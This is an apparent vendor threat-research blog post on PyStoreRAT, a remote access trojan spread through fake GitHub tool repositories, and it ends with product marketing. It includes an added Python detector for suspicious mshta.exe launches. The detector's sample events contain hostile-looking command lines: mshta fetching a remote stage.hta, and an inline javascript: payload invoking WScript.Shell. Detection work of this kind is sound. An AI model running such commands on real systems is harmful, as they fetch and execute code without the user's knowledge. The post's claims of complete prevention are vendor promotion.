
A New Supply Chain Threat Targeting Developers: What You Need to Know About PyStoreRAT 

Brad LaPorte
12 Jan 2026
4 min read
Threat Research

Attackers are no longer relying only on phishing emails or malicious documents to compromise organizations. They have shifted their focus to something far more powerful: the trust developers place in open-source tools and GitHub-hosted code.

In Morphisec’s latest threat research, our team uncovered PyStoreRAT, a stealthy, modular Remote Access Trojan (RAT) delivered through weaponized GitHub repositories masquerading as development utilities and OSINT tools. The campaign reveals a strategic evolution in attacker behavior: compromising the people and platforms that power innovation. 

To help business and security leaders understand the implications of this threat, we’ve created a 2-page Executive Briefing that summarizes what PyStoreRAT is, how it works and what it means for your organization. 


What Makes PyStoreRAT a New Class of Threat? 

Unlike traditional malware that relies on malicious attachments or phishing lures, PyStoreRAT uses a stealth-first delivery chain. Here’s how it works: 

  • GitHub repositories disguised as legitimate projects 
  • Lightweight Python/JavaScript loader stubs that appear harmless 
  • Fileless HTA execution via mshta.exe 
  • A modular JS-based RAT capable of running EXE, DLL, MSI, Python, PowerShell, and more 
  • Built-in evasion targeting CrowdStrike Falcon and modern EDR controls 

It is fast, flexible, and engineered to blend into developer environments, where traditional detection tools struggle the most.
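The chain above (a Python or JavaScript loader stub handing off to mshta.exe for fileless HTA execution) leaves a recognizable parent/child pattern in process-creation telemetry. The following is an added detection example, not Morphisec's code or part of the original research. It assumes events shaped like Sysmon Event ID 1 or EDR process-start records (host, pid, image, parent_image, cmdline); the field names and the sample events are constructed for illustration, not taken from a real incident.

```python
"""Added example: flag mshta.exe launches that match the loader-stub -> HTA
chain described above. Not Morphisec's code; event shape and samples are
assumptions made for this illustration."""
import re

# Interpreters a developer-tool loader stub would typically run under
# (assumption: extend to whatever script hosts your fleet actually uses).
SCRIPT_HOSTS = {"python.exe", "python3.exe", "pythonw.exe", "node.exe",
                "wscript.exe", "cscript.exe"}

# mshta given a URL or an inline javascript:/vbscript: payload means the
# script never lands on disk as an .hta file (fileless execution).
REMOTE_OR_INLINE = re.compile(r"(https?://|javascript:|vbscript:)", re.IGNORECASE)


def basename(path):
    """Lower-cased final path component, tolerant of \\ and / separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_mshta_chain(events):
    """Return one alert per mshta.exe start that matches the chain.

    medium: spawned by a script host OR given a remote/inline script argument
    high:   both conditions at once (stub-driven, fileless HTA stage)
    """
    alerts = []
    for ev in events:
        if basename(ev.get("image", "")) != "mshta.exe":
            continue
        reasons = []
        parent = basename(ev.get("parent_image", ""))
        if parent in SCRIPT_HOSTS:
            reasons.append(f"spawned by script host {parent}")
        if REMOTE_OR_INLINE.search(ev.get("cmdline", "")):
            reasons.append("remote or inline script argument (fileless)")
        if reasons:
            alerts.append({
                "host": ev["host"],
                "pid": ev["pid"],
                "parent": parent,
                "severity": "high" if len(reasons) == 2 else "medium",
                "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry (not real IOCs): one benign mshta launch from
# explorer.exe with a local .hta, and three that match parts of the chain.
SAMPLE_EVENTS = [
    {"host": "dev01", "pid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Tools\legacy-ui.hta"'},
    {"host": "dev01", "pid": 4212, "image": r"C:\Python312\python.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"python.exe osint_helper.py"},
    {"host": "dev01", "pid": 4230, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Python312\python.exe",
     "cmdline": r"mshta.exe http://example.invalid/stage.hta"},
    {"host": "dev02", "pid": 5100, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r"mshta.exe C:\Users\dev\AppData\Local\Temp\u.hta"},
    {"host": "dev03", "pid": 6002, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "javascript:close(new ActiveXObject(\'WScript.Shell\'))"'},
]

if __name__ == "__main__":
    for alert in find_mshta_chain(SAMPLE_EVENTS):
        print(alert)
```

The benign launch (explorer.exe running a local .hta) produces no alert; the python.exe child with an http:// argument is rated high, while the node.exe child with a local temp file and the explorer.exe launch with an inline javascript: payload are each rated medium. In production, the same two conditions map directly onto a process-creation rule in your EDR or SIEM, keyed on ParentImage and CommandLine.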

Why This Matters for CEOs, CIOs & CISOs 

PyStoreRAT demonstrates a growing trend: developers, engineers, and automation teams are now top-tier attack vectors. 

That means: 

  • Open-source ecosystems can no longer be implicitly trusted 
  • Compromised development environments can lead to supply chain compromise 
  • Credential theft becomes the opening stage of modern ransomware 
  • Script-based, fileless malware can slip past signature-based and many behavior-based defenses 
  • Developer workflows (from GitHub cloning to CI/CD pipelines) are increasingly at risk 

These attacks affect much more than IT infrastructure. They directly threaten intellectual property, cloud environments, software integrity, and business continuity.   

Inside the PyStoreRAT Campaign 

Our research uncovered a coordinated multi-month operation involving: 

  • AI-generated repository content 
  • Social promotion across YouTube and global forums 
  • Artificial star/fork inflation to build trust 
  • Multiple versions of loader stubs released over time 
  • A rotating, multi-domain C2 infrastructure 
  • Deployment of Rhadamanthys, a powerful information stealer, as a follow-on payload 

The result is a stealthy RAT that hides behind legitimate developer workflows, one that many organizations are not currently equipped to detect or stop.   

How Morphisec Stops PyStoreRAT Before It Executes 

Because PyStoreRAT relies on in-memory execution, obfuscated JavaScript, mshta.exe, and modular payload delivery, it is built to evade traditional EDR, antivirus, and sandbox-based tooling. 

Morphisec blocks it at the earliest stage using: 

  • Its pioneering Automated Moving Target Defense (AMTD) deception technology
  • Deterministic, pre-execution prevention 
  • Memory-based deception and credential protection 
  • Zero-impact protection for engineering workflows 

This means PyStoreRAT cannot assemble its payloads, steal credentials, or launch next-stage malware: the foothold is eliminated before it is established.   

Get the Executive Briefing 

We’ve distilled the full technical analysis into a 2-page executive summary that business and security leaders can reference in: 

  • Board briefings
  • Risk committee discussions 
  • Strategic planning sessions 
  • Incident response tabletop exercises 
  • Developer security program improvements 

Inside the brief, you’ll find: 

  • High-level attack overview 
  • Business implications and emerging risks 
  • Executive takeaways 
  • Recommended actions for CISOs and CIOs 
  • How Morphisec prevents this threat 
  • Indicators of compromise (IOCs) 

Get your copy of the executive briefing and book a personalized demo to see how Morphisec can help your organization guard against PyStoreRAT and other complex threats. 


About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak, both industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation for cybersecurity solutions years ahead of their time.
